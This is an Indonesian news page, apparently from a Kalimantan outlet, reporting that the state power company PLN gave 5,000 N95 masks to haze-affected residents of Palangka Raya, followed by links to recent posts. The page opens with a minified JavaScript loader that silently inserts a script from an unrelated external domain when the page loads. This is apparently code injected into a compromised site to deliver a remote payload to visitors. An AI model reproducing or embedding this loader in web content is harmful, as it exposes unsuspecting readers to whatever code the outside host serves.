(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
PLN KALSELTENG

Antisipasi ISPA Akibat Kabut Asap, PLN Bagikan 5.000 Masker untuk Masyarakat Kalteng


PALANGKARAYA, Kabut asap yang semakin tebal beberapa minggu terakhir di Palangka Raya menggerakkan PT PLN (Persero) Unit Induk Wilayah Kalimantan Selatan dan Kalimantan Tengah (PLN UIW Kalselteng) untuk membagikan bantuan 5.000 masker bagi masyarakat.

Bantuan tersebut merupakan Corporate Social Responsibility (CSR) PLN Peduli bagi masyarakat terdampak kabut asap, khususnya di Kota Palangka Raya yang diserahkan kepada Badan Penanggulangan Bencana dan Pemadam Kebakaran (BPBPK) Provinsi Kalimantan Tengah, Selasa (17/9).

General Manager PLN UIW Kalselteng Sudirman yang memberikan langsung bantuan tersebut mengatakan bahwa tujuan pemberian bantuan masker tersebut adalah untuk meminimalkan dampak dan mengantisipasi terjadinya gangguan kesehatan seperti Infeksi Saluran Pernapasan (ISPA) pada masyarakat di Kota Palangka Raya yang terdampak bencana kabut asap.

“Kabut asap sudah semakin tebal di Kalimantan Tengah, khususnya Palangka Raya ini. Kabut asap ini tentu membuat masyarakat susah bernapas. Bantuan ini merupakan kepedulian PLN kepada masyarakat dan diharapkan dapat membantu masyarakat agar terhindar dari dampak kabut asap,” ujar Sudirman.

Masker yang diberikan oleh PLN yaitu masker berjenis N95. Masker tersebut adalah masker yang mampu menyaring 95 persen partikel udara dan digunakan ketika kualitas udara berada di atas 300 pollutant standards index (PSI).

Masker ini memang cocok untuk membantu warga yang terdampak musibah kabut asap dengan kualitas udara yang sangat berbahaya yang diakibatkan kabut asap. “Ketika bernapas dalam keadaan kabut asap yang tebal, dikhawatirkan partikel-partikel kecil ikut masuk ke dalam saluran pernapasan. Hal tersebut yang memungkinkan menyebabkan ISPA pada tubuh kita. Oleh karena itu diharapkan masker ini dapat membantu masyarakat dalam beraktivitas jika memang dengan terpaksa harus keluar rumah,” kata Sudirman.

Sudirman berharap bantuan masker tersebut dapat bermanfaat bagi masyarakat di Kalteng, khususnya di Palangka Raya. Sudirman juga mendoakan agar kebakaran hutan dan kabut asap yang terjadi dapat segera berlalu.

Sekretaris BPBPK Kalimantan Selatan,  Maria Cahaya menyatakan rasa terima kasihnya kepada PLN atas bantuan masker kepada masyarakat Kalteng. Ia menyampaikan bahwa dalam keadaan kabut asap yang semakin tebal, masker sangat diperlukan.

Maria mengatakan bahwa dengan kualitas udara kota Palangka Raya saat ini tentu sangat berbahaya apabila udara yang bercampur asap dihirup oleh masyarakat. “Dengan kondisi semacam ini di mana semua orang membutuhkan masker, barang ini tentu bisa saja menjadi sulit dicari. Kami mengucapkan terima kasih kepada PLN yang telah menunjukkan kepeduliannya kepada masyarakat dengan memberikan bantuan 5000 masker. Semoga masker ini dapat bermanfaat ,” pungkasnya.(cel/hms)

Reporter : cel/hms
Editor : Cell

 


Desy Arfianty

Recent Posts

Kritik Standar Etika Pejabat: Jalur Pintas hingga DPR Jadi ‘Dewan Perwakilan Partai’

KANALKALIMANTAN.COM, JAKARTA - Direktur Lingkar Madani (LIMA) Indonesia, Ray Rangkuti, melontarkan kritik pedas terhadap merosotnya… Read More

3 jam ago

98 Usulan Infrastruktur dari Musrenbang Halong

KANALKALIMANTAN.COM, PARINGIN – Permintaan pembangunan infrastruktur mendominasi Musyawarah Perencanaan Pembangunan (Musrenbang) Kecamatan Halong yang membahas… Read More

3 jam ago

Digitalisasi Pajak Lewat Bimtek Aplikasi SAPAT Kolaborasi BPPRD Banjarbaru – Bank Kalsel

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota Banjarbaru terus mempercepat transformasi digital dalam tata kelola keuangan daerah.… Read More

17 jam ago

Apresiasi Pemko Banjarmasin untuk Pembagian 2.500 Sepatu

KANALKALIMANTAN.COM, BANJARMASIN - Kota Banjarmasin menjadi lokasi kegiatan berbagi 2.500 sepatu ke anak sekolah oleh… Read More

21 jam ago

Unjuk Rasa Menuntut Solusi Banjir Kalsel di Rumah Banjar

KANALKALIMANTAN.COM, BANJARMASIN - Forum Rakyat Peduli Negara dan Bangsa (Forpeban) Kalimantan Selatan (Kalsel) menggelar unjuk… Read More

21 jam ago

PUPR Kalsel Beberkan Rencana Pembangunan Jembatan Barito Dua

KANALKALIMANTAN.COM, BANJARBARU - Pemprov Kalsel fokus pada penyusunan dan peninjauan detail engineering design (DED) sebagai bagian… Read More

21 jam ago

This website uses cookies.